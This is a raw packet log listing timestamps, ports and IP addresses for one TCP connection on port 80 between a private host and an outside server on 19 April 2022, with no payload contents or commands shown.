Apr 19, 2022 16:44:44.566895962 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.567034960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.567152977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.567192078 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.567254066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.567292929 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.567392111 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.567507029 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.567593098 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.567634106 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.567698002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.567735910 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.567874908 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.567954063 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.568037987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.568078995 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.568196058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.568237066 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.568321943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.568423033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.568487883 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.568526983 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.568635941 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.568674088 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.568757057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.568852901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.568936110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.568979025 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.569077015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.569118023 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.569204092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.569359064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.569418907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.569463015 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.569557905 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.569601059 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.569802046 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.570002079 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.570055008 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.570296049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.570468903 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.570517063 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.570729971 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.570955038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.571017027 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.571193933 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.571434021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.571480036 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.571600914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.571639061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.571783066 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.571834087 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.571882963 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.571922064 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.572038889 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.572092056 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.572231054 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.572276115 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.572356939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.572412968 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.572438955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.572534084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.572803020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.572830915 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.572856903 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.572892904 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.572917938 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.572988033 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.573029041 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.573118925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.573235035 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.573348999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.573401928 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.573463917 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.573506117 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.573565960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.573679924 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.573791981 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.573842049 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.573915958 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.574028015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.574079990 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.574115038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.574155092 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.574239969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.574369907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.574462891 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.574588060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.574609041 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.574640989 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.574708939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.574814081 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.574930906 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.575022936 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.575025082 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.575150013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.575258017 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.575262070 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.575387955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.575511932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.575567007 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.575603008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.575728893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.575793028 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.575833082 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.575944901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.576042891 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.576101065 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.576193094 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.576240063 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.576276064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.576416016 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.576562881 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.576617002 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.576621056 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.576663017 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.576766014 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.576889038 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.576956034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.577022076 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.577076912 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.577124119 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.577189922 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.577318907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.577438116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.577498913 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.577542067 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.577584028 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.577627897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.577759027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.577888012 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.577944994 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.577977896 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.578107119 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.578160048 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.578242064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.578284979 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.578310013 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.578439951 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.578483105 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.578552008 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.578684092 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.578746080 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.578771114 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.578870058 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.578933001 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.579020977 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.579108000 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.579224110 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.579273939 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.579361916 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.579406023 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.579463005 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.579600096 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.579652071 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.579721928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.579802036 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.579854965 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.579912901 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.580037117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.580089092 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.580121994 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.580275059 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.580436945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.580513954 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.580599070 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.580666065 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.580915928 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.581171989 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.581321955 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.581356049 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.581526041 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.581598997 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.581645966 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.581820011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.581878901 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.581888914 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.582046986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.582086086 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.582108021 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.582221031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.582319975 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.582444906 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.582715034 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.582756996 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.582828045 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.582950115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.583039045 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.583087921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.583204031 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.583256006 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.583306074 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.583400011 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.583534002 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.583584070 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.583631992 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.583684921 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.583765984 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.583884954 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.584002972 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.584125042 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.584218025 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.584321976 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.584418058 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.584446907 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.584598064 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.584681988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.584721088 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.584803104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.584882021 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.584928989 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.584985971 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.585124969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.585125923 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.585242987 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.585345984 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.585443974 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.585549116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.585608959 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.585684061 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.585803986 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.585925102 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.586034060 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.586054087 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.586124897 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.586215019 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.586282015 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.586402893 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.586518049 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.586529970 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.586601973 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.586720943 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.586802006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.586918116 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.586970091 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.587069988 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.587163925 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.587280989 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.587317944 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.587362051 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.587536097 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.587635040 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.587685108 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.587718010 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.587762117 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.587878942 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.587918043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.588041067 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.588083029 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.588156939 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.588200092 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.588282108 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.588385105 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.588524103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.588572025 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.588638067 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.588680983 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.588758945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.588882923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.588993073 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.589035034 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.589190960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.589246035 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.589438915 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.589528084 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.589674950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.589745998 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.589764118 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.589885950 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.589939117 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.590004921 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.590044975 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.590127945 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.590250969 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.590291977 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.590358019 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.590692043 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.590739965 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.590848923 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.591049910 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.591197014 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.591299057 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.591533899 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.591815948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.591878891 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.592068911 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.592112064 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.592252970 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.592350960 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.592490911 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.592535019 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.592573881 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.592622042 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.592689991 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.592798948 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.592926979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.592974901 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.593089104 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.593132973 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.593206882 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.593327999 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.593403101 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.593451977 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.593528032 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.593573093 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.593605995 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.593730927 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.593802929 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.593853951 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.593966961 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.594085932 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.594132900 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.594249964 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.594294071 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.594316006 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.594403982 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.594506979 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.594547987 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.594645023 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.594686985 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.594748020 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.594844103 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.594964027 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.595019102 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.595067024 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.595108032 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.595204115 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.595276117 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.595396996 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.595449924 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.595509052 CEST	80	49758	45.135.48.153	192.168.2.4
Apr 19, 2022 16:44:44.595550060 CEST	49758	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:44:44.595647097 CEST	80	49758	45.135.48.153	192.168.2.4
